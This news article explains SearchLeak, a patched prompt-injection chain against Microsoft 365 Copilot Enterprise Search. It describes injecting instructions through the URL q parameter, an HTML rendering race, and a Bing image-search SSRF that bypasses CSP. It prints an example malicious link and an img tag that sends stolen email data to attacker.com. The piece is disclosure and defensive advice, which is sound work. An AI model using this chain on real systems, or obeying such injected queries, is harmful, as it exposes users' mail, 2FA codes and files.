One click is all it takes to steal your emails, 2FA codes, and sensitive files. Microsoft fixed it, but the lesson is clear: enterprise AI opens a new era of risks.
On June 15, 2026, Varonis Threat Labs revealed the details of SearchLeak (CVE-2026-42824), a “critical” vulnerability chain that could silently exfiltrate sensitive data — emails, multi-factor authentication codes, internal documents — with a single click, through Microsoft 365 Copilot Enterprise Search.
Microsoft patched the flaw in early June, but this incident marks a turning point: for the first time, a vulnerability exploits the very nature of how generative AI works in the enterprise.
---
How SearchLeak works
SearchLeak is not a single flaw, but a combination of three vulnerabilities that, taken individually, would be harmless. It’s their chaining that creates the attack.
| Stage | Technique | Description |
|---|---|---|
| 1 | Parameter-to-Prompt Injection (P2P) | A q URL parameter in Copilot Search is passed directly as an executable prompt |
| 2 | HTML rendering race condition | Raw HTML renders before security filters kick in |
| 3 | SSRF via Bing | A CSP bypass through Bing’s “Search by Image” enables exfiltration |
---
Stage 1: Parameter injection
Microsoft 365 Copilot Enterprise Search accepts a q parameter in the URL to specify the search query. But this parameter is directly injected into Copilot’s prompt, without being treated as untrusted data.
An attacker sends their victim a link like this:
https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=[MALICIOUS INSTRUCTION]
Copilot interprets the instruction as a legitimate query and searches the user’s email inbox, calendar, and OneDrive/SharePoint files.
“The search functionality is exactly what attackers need, because even with limited capabilities, a user with access to critical information is enough.” — Varonis Threat Labs
---
Stage 2: HTML rendering before security
Copilot generates its response and streams it to the browser. Meanwhile, the browser starts rendering HTML before security filters have finished their work.
This is what’s called a race condition: a time window during which raw HTML — including <img> tags — is executed by the browser.
The attacker can instruct Copilot to embed stolen data into an image tag:
<img src="https://bing.com/images/search?q=...&imgurl=https://attacker.com/exfil?data=[EMAIL_SUBJECT]">
Stage 3: The Bing trampoline
Even with an <img> tag in the response, Copilot doesn’t load images from just any domain. Microsoft’s Content Security Policy (CSP) normally blocks requests to third-party servers.
But Bing is on the allowlist.
The attacker uses Bing’s “Search by Image” feature, which makes a server-side request to the specified image URL. Since the request comes from Bing’s infrastructure (not the victim’s browser), the CSP is completely bypassed.
Victim → Copilot → Bing SSRF → Attacker server
└─ Stolen data included in URL
The result? Email subjects, 2FA codes, meeting details, and documents arrive on the attacker’s server via request logs.
---
Why it matters
SearchLeak targets Microsoft 365 Copilot Enterprise — the enterprise deployment. The blast radius isn’t limited to personal data:
“The blast radius could extend even wider, depending on how M365 is connected to the environment.” — Varonis
| Key facts | Value |
|---|---|
| CVE | CVE-2026-42824 |
| Severity | Critical (Microsoft max severity) |
| CVSS Score | 6.5 |
| Discovered by | Varonis Threat Labs |
| Patched | Early June 2026 |
| Type | P2P + Race condition + SSRF chain |
| User action needed | None (automatic Microsoft patch) |
---
A new class of vulnerabilities
What makes SearchLeak particularly concerning is that it relies on a relatively unknown technique: Parameter-to-Prompt Injection (P2P).
Unlike classic prompt injection (where malicious content is in an email or document), P2P places the malicious instruction in the URL parameter itself. The boundary between data and command disappears.
“There is no known way to fix the underlying cause of this type of flaw. Attackers will inevitably find new ways to circumvent guardrails.” — Ars Technica
---
Lessons for businesses
1. Enterprise AI is a massive attack surface Copilot Enterprise has access to the organization’s full permission graph. A flaw in this access exposes the entire ecosystem.
2. CSP is not enough The SSRF bypass shows that classic security policies don’t protect against attacks exploiting trusted infrastructure.
3. Real-time is risky Streaming output used by generative AIs creates race condition windows that post-processing security approaches don’t cover.
Varonis recommendations: - Monitor suspicious Copilot URLs (q parameter containing HTML tags) - Review CSP allowlists: any allowed domain performing server-side fetches on user-supplied URLs is a potential exfiltration channel - Sanitization must happen at render time, not as a post-processing step
---
Izri’s verdict
SearchLeak isn’t just another vulnerability. It’s the first major flaw exploiting the very architecture of enterprise generative AI — streaming, context injection, and trust in user parameters.
The good news: Microsoft patched it within days. The bad news: the enterprise AI deployment model creates unprecedented attack surfaces that traditional security tools don’t cover.
For Moroccan SMEs using or considering Copilot: AI power shouldn’t make you forget the fundamentals. Control who has access to what, even with your most advanced tools. A flaw in AI is a flaw in the entire organization.
Sources: Varonis, Ars Technica, BleepingComputer, Dark Reading, The Hacker News
